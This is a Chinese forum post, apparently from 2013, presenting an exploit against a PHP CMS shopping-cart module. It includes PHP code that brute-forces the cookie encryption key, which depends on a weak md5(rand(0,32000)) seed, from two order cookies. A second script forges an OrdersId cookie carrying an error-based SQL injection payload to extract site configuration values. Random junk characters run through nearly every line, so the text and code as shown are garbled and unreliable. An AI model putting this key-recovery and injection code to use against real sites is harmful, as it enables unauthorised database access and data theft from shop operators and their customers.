www.xxx.com/plus/search.php?keyword=( n2 p4 z) ?; s0 U
在 include/shopcar.class.php中
0 Z- c7 ?- B7 Z! F" P* z+ F先看一下这个shopcar类是如何生成cookie的2 A0 R# q7 v5 ~! M2 ~
239 function saveCookie($key,$value)
0 ]1 F+ L# ~4 l R) j240 {/ ?! Y( l+ ~0 Y/ N4 K6 z6 }
241 if(is_array($value))
$ e M2 v3 D7 a242 {$ S; L' c" o" _6 H" z V9 B
243 $value = $this->enCrypt($this->enCode($value));2 Y. B% o: _' h1 [
244 }% g) Q" x/ h, |( j+ z
245 else
) |) ~2 U+ E, @% M246 {
5 f6 L5 Q* n) {/ X' S5 ?9 N247 $value = $this->enCrypt($value); f. Y" O% L3 M& b
248 }7 L/ ~9 C+ a' P# o6 u0 F0 o
249 setcookie($key,$value,time()+36000,’/');
6 o/ w4 _) c& |4 L5 w250 }
' s! D3 ~6 ]1 S$ V简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
- e8 v- R" S0 K2 J. Z/ Q186 function enCrypt($txt)' }, w" U, _) |
187 {
# l# I4 @, P( J" L188 srand((double)microtime() * 1000000);$ ^" I9 h5 ]0 V# q
189 $encrypt_key = md5(rand(0, 32000));& r' H3 a5 N! {- i; I* V% ]7 a
190 $ctr = 0;4 K3 @5 ~! D7 g% ?6 y8 r
191 $tmp = ”;
( E+ [- E$ V1 s' q0 S* m4 Z4 k192 for($i = 0; $i < strlen($txt); $i++)
" i: a# a0 J5 }1 u& H' k( b) n, g193 {7 w- [& D( u$ I
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; i, P. Y) J8 l) ]7 z2 _. S4 b$ ~
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 ^$ o- o5 M4 C' Y( }9 v, O
196 }3 ~6 s o+ f4 a2 L7 C7 F) i8 F
197 return base64_encode($this->setKey($tmp));
y; C5 g$ i" V$ g; {3 k1 m198 }% t2 l; {% ?" t, H% p6 n2 [
213 function setKey($txt)1 [* Q7 H0 w0 |" Q+ W; o' j6 \ q
214 {/ Z6 ?- ^, h9 @2 F4 Z8 I
215 global $cfg_cookie_encode;
1 h. U2 e p) x# Q7 y216 $encrypt_key = md5(strtolower($cfg_cookie_encode));+ N7 o2 V3 q3 y& `
217 $ctr = 0;
% N+ S u! W2 R: |* ~218 $tmp = ”;# J3 Q5 v( q' u; n5 G$ G
219 for($i = 0; $i < strlen($txt); $i++)
) d3 @# o b/ o' `220 {
# ]. A8 h3 W; Q221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
/ k+ j5 S5 P# N; }. _' K222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
2 n9 N/ l# n0 Y; [: m) b7 n* r2 K8 e223 } Q% {$ h+ B7 ]1 q1 t8 l$ ]; X
224 return $tmp;; ?; c, i: ?/ ?* p; O; C# A
225 }8 v- ]+ B6 F: K( _" r( E7 Z
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
9 y) O% V* Q3 |- A9 F1 y' V5 g# R然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。0 ?6 O1 a J7 t Y5 Q9 {$ I
具体代码如下:
2 h0 i5 V" r0 q" {' z" M4 |" ]+ _<?php
% O/ w: U1 O( _$ M6 t3 s s$ Q* C$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
; } `0 D. r, e$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
4 U% T, Z7 c# Y$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
+ Z& f1 F3 d3 N. w; i$ gfunction reStrCode($code,$string)
+ z! E( p& ?' [3 W3 y; o{
l, e% z& H. c$ b) b$code = base64_decode($code);) X U( Z# a( u3 ~
$key = “”;+ g/ }& Y+ F6 |- I/ I1 P
for($i=0 ; $i<32 ; $i++)
2 o8 a$ p* n& F* _9 K. O{
, Q* O7 y# }) z0 R+ k8 t5 v6 z$key .= $string[$i] ^ $code[$i];2 v/ P$ t8 @6 f- r; B
}9 f9 ^2 r! f J* n( D' U
return $key;0 n1 U% D" o$ S- W
}6 s; k& T: \" @% U+ y% q
function getKeys($cookie,$plantxt)- F& Z( p8 z6 e1 z9 V1 [
{4 L5 R1 a0 V# e4 Y, p" a
$tmp = $cookie;9 w" J" s6 `. ?. ^) Y! C5 N7 }
$results = array(); D" {! k: P# q
for($j=0 ; $j < 32000; $j++)
7 x. ]) G r( |. _{
) @" {* S3 `8 {4 G' P8 f' z/ d" W$ J8 v* ^* z W6 T
$txt = $plantxt;
9 y" c0 R ^/ V$ctr = 0;% E" B, h! R/ u7 y
$tmp = ”;+ M, D0 f( X5 }2 S
$encrypt_key = md5($j);9 a# s) n4 y0 ]0 Z4 B' X
for($i =0; $i < strlen($txt); $i ++)
1 i6 H6 L4 r# ]{ ~( D5 V; A" I8 D* l# _
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 n R3 V& v8 P
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
; w. j9 Z& a; |& M' k: Z( }}
5 Z4 o; X3 E2 B9 N+ s$string = $tmp;
6 ?* r. d" C) u$code = $cookie;
; D' [' u- F+ U& }$result = reStrCode($code,$string);
8 B/ K E( }' e/ w% K8 D/ kif(eregi(‘^[a-z0-9]+$’,$result))1 q. {. M/ j, s5 O& _" g6 J
{$ @4 u. _8 r. f7 t$ m
echo $result.”\n”;. Z+ B7 C0 S3 ^9 s- e$ S3 g1 P% A, @. h
$results[] = $result;
! Y( j: {" l6 e$ {9 V" L1 v5 ^: @}
% r4 K- u: |: _6 M3 b6 _/ f5 I7 d}
% ^. i l# w! g1 g( a7 m7 ?- w4 C3 Yreturn $results;
: T) D$ ]7 }' {1 R9 D, c}
& M9 S8 _; `$ v3 P7 f* S$results1 = getKeys($cookie1,$plantxt);
" P9 m5 o0 c+ m( u6 L2 d) Z- @$results2 = getKeys($cookie2,$plantxt);
4 f4 `- @6 L# A0 d( C* B% @ }print “\n——————–real key————————–\n”;
* Q3 }! r' B2 oforeach($results1 as $test1)7 j6 B! T0 O/ c# f
{: w2 w- G: O1 U, m/ b' A
foreach($results2 as $test2)3 u: _0 ` _" L
{! q; r- n) K) p1 N
if($test1 == $test2)
& }; ]/ J& s) a+ w T{6 t" `* G j1 B
echo $test1.”\n”;
4 g( y8 G1 z0 u' Z}2 k$ U6 E1 R' _1 Y
}& J& L5 A* b/ A8 E
}- ]( B- {5 ^# g& v R
?>
5 Z3 r5 R+ c0 O8 D$ Hcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
% l1 C1 e$ R% |1 n4 P" v1 w) [6 C9 Jplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua15 U g7 c @) P$ b
然后推算出md5(strtolower($cfg_cookie_encode))( p) @2 P+ p, d7 w
得到这个key之后,我们就可以构造任意购物车的cookie9 n; S0 Q" E7 A- w% {* @4 _& w) B3 |
接着看
2 w& [1 Y/ H+ }0 }0 H/ g+ T/ i20 class MemberShops
, E: |; t1 T& j% F( Y- u, a21 {+ m4 U9 W5 F: T5 c
22 var $OrdersId;4 [: D8 F' b4 X9 _) a" q3 x
23 var $productsId;
0 V& ]8 _2 p4 L/ |/ }24& a( a1 p5 g, \( o: R4 y/ y6 {! N
25 function __construct()7 S: G. H* b+ J& ^0 I) B+ m- y
26 {" i$ q E2 M6 _9 `
27 $this->OrdersId = $this->getCookie(“OrdersId”);
. T& q0 a' h" }( \; a) U) K28 if(empty($this->OrdersId))9 m# D1 F" q \) O5 {
29 {$ G7 D- ]. T7 P) J6 e! f6 Z
30 $this->OrdersId = $this->MakeOrders();
5 Y$ h! {# v3 Y/ e- `7 \3 O31 }
: n/ ?- V7 W I) {% h32 }
2 D& S2 X& |$ k$ i发现OrderId是从cookie里面获取的" N' b+ ~) B; W4 ^
然后
8 A5 E7 e3 r7 G- q+ L/ ?/plus/carbuyaction.php中的% S- O! Y9 |/ o
29 $cart = new MemberShops();1 d3 T" V' r8 M) {# S
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
# J b7 z- ~& \2 H# x5 o……
1 @3 ^ R3 y% ~9 g" c173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);# V" N" d# s% g9 ~8 p
接着我们就可以注入了
8 @% g6 j$ {( Z, \: u0 g通过利用下面代码生成cookie:: Z L/ v, x5 V+ {
<?php
: U/ b7 m8 G& ^/ ?; \: v: @6 i/ c$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;/ b1 K$ e3 {# u" C7 M9 V" Q' K
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here0 q4 W7 C/ |/ }( R+ m2 e! ~
function setKey($txt)
5 h: a5 R# t+ u( w; c, R$ L: x{1 c2 x0 P/ M' M& y, [
global $encrypt_key;
3 C; S5 E1 U+ J# o: ]" b" s: [( g$ctr = 0;
4 @5 \: ~8 S& X& p$ ?4 S$tmp = ”;
4 v8 R/ ]& p2 P: o: D0 T/ M3 e1 ]for($i = 0; $i < strlen($txt); $i++)- E: a* _0 F, v" d
{
; E* u& K6 V( X$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;4 j) P" s5 t3 i( w$ i
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];5 y0 t% _7 u, G
}
0 X# K+ @1 D# F4 H# nreturn $tmp;# G9 {( `9 o& k: S* D" E. h
}
& ~) R! I9 I- c1 u. Xfunction enCrypt($txt)
. _# f% P9 x& Y% b8 n P1 Q{: d4 [; [* ~) P7 H. i* @
srand((double)microtime() * 1000000);
' ~1 \+ h$ b6 L& i& s$encrypt_key = md5(rand(0, 32000));) s; J0 e- V; t! v6 Y1 G! L
$ctr = 0;9 A o c, P: h9 n6 F
$tmp = ”;8 s9 G, N/ e5 g6 {* B, ]( S: w
for($i = 0; $i < strlen($txt); $i++)" C. Z2 }2 `8 M3 Y" r4 `
{% ~+ e8 u& R, K/ Y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 \9 ~1 o) n% a$ o+ B! B9 L
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
: h& x0 J: T" u% `# t+ y2 l0 L1 k}
% b( L' ?$ o% h2 U' Ireturn base64_encode(setKey($tmp));& t8 j' z F7 g1 t3 D2 Q1 J
}& k$ e- F- g% F. R6 H, `! {
for($dest =0;$dest = enCrypt($txt);)5 y! {; `6 b3 a i7 }1 g. H) X3 s9 N5 F8 Q
{
! t9 |8 A& `; Z5 {0 {* r2 y( Oif(!strpos($dest,’+'))
7 o1 V* {! Y' Z, A( c c# _" m' S{9 m/ h9 _) N$ P6 C5 D! Q+ [6 s2 K2 `2 K: h
break;: b* G1 F% d5 g+ O1 g3 M9 K5 m
}9 D Z) h7 q0 q) a/ M+ O
}
& C8 B. o. D7 e2 C0 g1 Iecho $dest.”\n”;
5 H3 ?# g3 }% S) D3 I' V- i?>
7 Y) x n8 n! v2 A
; n, [( {8 s m- d, a; Q5 Y |
发表于 2013-2-13 23:58:29
收藏
分享
支持
反对